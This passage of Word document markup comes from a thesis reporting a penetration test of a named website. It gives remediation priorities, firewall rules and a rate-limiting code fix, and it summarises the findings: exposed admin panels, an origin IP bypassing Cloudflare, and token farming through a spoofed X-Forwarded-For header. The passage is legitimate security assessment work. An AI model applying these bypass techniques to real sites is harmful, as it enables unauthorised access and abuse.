            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2 hours</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N-015 Webmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 2096 to trusted IPs</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N-018 cPanel ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall ports 2078, 2091</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P1 — 24 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-013/014 2FA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enable two-factor authentication on cPanel + WHM</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N-010 Wildcard DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Remove wildcard DNS record</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N-016 Dir listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Add </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Options -Indexes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to Apache config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>P2 — 1 week</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-009 CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Remove unsafe-inline from script-src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4 hours</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N-012 SPF/DMARC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Set SPF to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>-all</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, DMARC to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>p=reject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>30 min</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N-007 JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Add device fingerprint or Turnstile to token endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1 day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>P3 — 1 month</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-004 Hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plan migration to dedicated isolated infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Ongoing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 13: Remediation priority matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implementing P0 actions alone — which require approximately 90 minutes total — eliminates all four Critical findings and reduces the overall risk posture by the equivalent of 40 CVSS score points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.2 Firewall Rules (P0 — Most Critical)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The fastest and highest-impact remediation is applying firewall rules to block administrative ports from public access. On Cloudways, this can be done via the Platform → Server → Security → IP Whitelist dashboard, which is more reliable than OS-level rules:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Using UFW on the Ubuntu server:</w:t>
        <w:br/>
        <w:t>ufw allow from [trusted-management-ip] to any port 22</w:t>
        <w:br/>
        <w:t>ufw deny 2083</w:t>
        <w:br/>
        <w:t>ufw deny 2087</w:t>
        <w:br/>
        <w:t>ufw deny 2096</w:t>
        <w:br/>
        <w:t>ufw deny 9001</w:t>
        <w:br/>
        <w:t>ufw deny 3306</w:t>
        <w:br/>
        <w:t>ufw allow from [trusted-admin-ip] to any port 2083</w:t>
        <w:br/>
        <w:t>ufw allow from [trusted-admin-ip] to any port 2087</w:t>
        <w:br/>
        <w:t>ufw enable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This single configuration change eliminates findings N-001, N-002, N-013, N-014, and N-015 in approximately 30 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.3 Rate Limiting Fix (P1 — Critical Within 24 Hours)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The root cause of N-005 is using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for rate limiting instead of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CF-Connecting-IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// WRONG — client can spoof this value:</w:t>
        <w:br/>
        <w:t>const clientIP = req.headers['x-forwarded-for']?.split(',')[0];</w:t>
        <w:br/>
        <w:br/>
        <w:t>// CORRECT — Cloudflare sets this; the client cannot spoof it:</w:t>
        <w:br/>
        <w:t>const clientIP = req.headers['cf-connecting-ip']</w:t>
        <w:br/>
        <w:t xml:space="preserve">              || req.headers['x-forwarded-for']?.split(',')[0]</w:t>
        <w:br/>
        <w:t xml:space="preserve">              || req.socket.remoteAddress;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Cloudflare dashboard, under Rate Limiting rules, select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"True Client IP (CF-Connecting-IP)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the rate-limiting identifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.4 Long-Term Security Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The underlying cause of 59% of findings in this engagement is a network architecture where database and administrative services are exposed on the same public IP as web services, with no network-level segregation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5400000" cy="4737833"/>
            <wp:docPr id="39" name="Picture 39"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="recommended_architecture.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="4737833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 5.1: Recommended network security architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Moving to dedicated hosting with proper network segmentation would eliminate the shared hosting lateral movement risk, the exposed admin panels, and the publicly accessible database in a single infrastructure change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 6: CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.1 Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This thesis presented a complete black-box Vulnerability Assessment and Penetration Testing engagement on neuralsh.com, conducted under the supervision of Prestige Alliance Co., Ltd. Beginning with no credentials, source code, or internal documentation, the assessment mapped the full external attack surface of the target using DNS enumeration, port scanning, service fingerprinting, manual web application testing, and controlled exploitation. The engagement identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>20 distinct vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 4 Critical, 5 High, 7 Medium, and 4 Low severity — and confirmed the successful exploitation of two attack chains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The origin server IP was discovered through a three-step DNS analysis chain, bypassing the Cloudflare WAF entirely and directly exposing the backend infrastructure hosting WHM, cPanel, MySQL, and MikroTik administration panels — all publicly accessible without IP restriction. The most actionable finding was a rate-limiting bypass that achieved a 100% bypass rate through a single HTTP header manipulation, enabling unlimited API token farming with zero defensive responses from the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.2 Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The four Critical findings together represent a complete server compromise path available to any unauthenticated internet attacker:</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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WHM (CVSS 10.0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Root-equivalent server access if credentials obtained via brute force or phishing</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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cPanel (CVSS 9.8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Full hosting account control; password reset flow available to any attacker</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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MySQL (CVSS 9.8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Direct database access from public internet; brute-force attack surface with no network barrier</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b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MikroTik (CVSS 9.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Full network infrastructure control if default credentials remain active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The rate-limiting bypass (N-005) was the most immediately exploitable finding: trivial to execute, 100% effective, and fixable with a one-line code change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.3 Exploitation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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EXPLOIT-001: Rate Limit Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>50/50 tokens — 0 rate limits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>master_report.txt; Figure 4.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
